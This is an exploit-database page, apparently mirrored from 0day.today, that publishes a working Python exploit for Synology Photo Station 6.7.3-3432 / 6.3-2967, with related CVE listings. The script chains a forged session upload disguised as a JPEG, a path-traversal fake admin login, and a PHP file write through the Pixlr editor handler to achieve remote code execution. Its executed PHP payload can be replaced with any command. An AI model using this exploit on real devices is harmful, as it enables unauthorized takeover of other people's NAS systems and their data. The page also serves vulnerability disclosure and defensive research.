Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtKacper Szurek1337DAY-ID-28249
HistoryAug 08, 2017 - 12:00 a.m.

Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution Exploit

2017-08-0800:00:00
Kacper Szurek
0day.today
29

0.803 High

EPSS

Percentile

98.3%

JSON

Exploit for hardware platform in category web applications

'''
Source: https://blogs.securiteam.com/index.php/archives/3356
 
Vulnerability details
The remote code execution is a combination of 4 different vulnerabilities:
 
Upload arbitrary files to the specified directories
Log in with a fake authentication mechanism
Log in to Photo Station with any identity
Execute arbitrary code by authenticated user with administrator privileges
The chain of vulnerabilities will allow you, in the end, to execute code as:
 
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
'''
import requests
 
# What server you want to attack
synology_ip = 'http://192.168.1.100'
 
# Your current IP
ip = '192.168.1.200'
 
# PHP code you want to execute
php_to_execute = '<?php echo system("id"); ?>'
 
encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
 
print "[+] Set fake admin sesssion"
file = [('file', ('foo.jpg', encoded_session))]
 
r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
print r.text
 
print "[+] Login as fake admin"
 
# Depends on version it might be stored in different dirs
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
 
try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
 
whichact = {'action' : 'get_setting'}
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print r.text
 
print "[+] Upload php file"
 
c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print r.text
 
 
print "[+] Execute payload"
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
 
print f.text

#  0day.today [2018-04-12]  #

Related

packetstorm 1
seebug 2
openvas 2
cvelist 5
cve 5
nvd 5
prion 5
checkpoint_advisories 1
packetstorm
packetstorm
Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution
2017-08-08 00:00:00
seebug
seebug
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
2017-09-29 00:00:00
Synology Photo Station Unauthenticated Remote Code Execution
2017-08-08 00:00:00
openvas
openvas
Synology Photo Station Multiple Vulnerabilities
2017-08-15 00:00:00
Synology Photo Station Detection
2015-05-26 00:00:00
cvelist
cvelist
CVE-2017-11152
2017-07-31 00:00:00
CVE-2017-11155
2017-07-31 00:00:00
CVE-2017-11154
2017-07-31 00:00:00
cve
cve
CVE-2017-11154
2017-08-08 15:29:07
CVE-2017-11151
2017-08-08 15:29:07
CVE-2017-11153
2017-08-08 15:29:07
nvd
nvd
CVE-2017-11151
2017-08-08 15:29:07
CVE-2017-11152
2017-08-08 15:29:07
CVE-2017-11155
2017-08-08 15:29:07
prion
prion
Information disclosure
2017-08-08 15:29:00
Deserialization of untrusted data
2017-08-08 15:29:00
Unrestricted file upload
2017-08-08 15:29:00
checkpoint_advisories
checkpoint_advisories
Synology Photo Station Arbitrary File Upload (CVE-2017-11151) - Ver2
2018-04-22 00:00:00

0.803 High

EPSS

Percentile

98.3%

JSON
Related for 1337DAY-ID-28249
packetstorm1seebug2openvas2cvelist5cve5nvd5prion5checkpoint_advisories1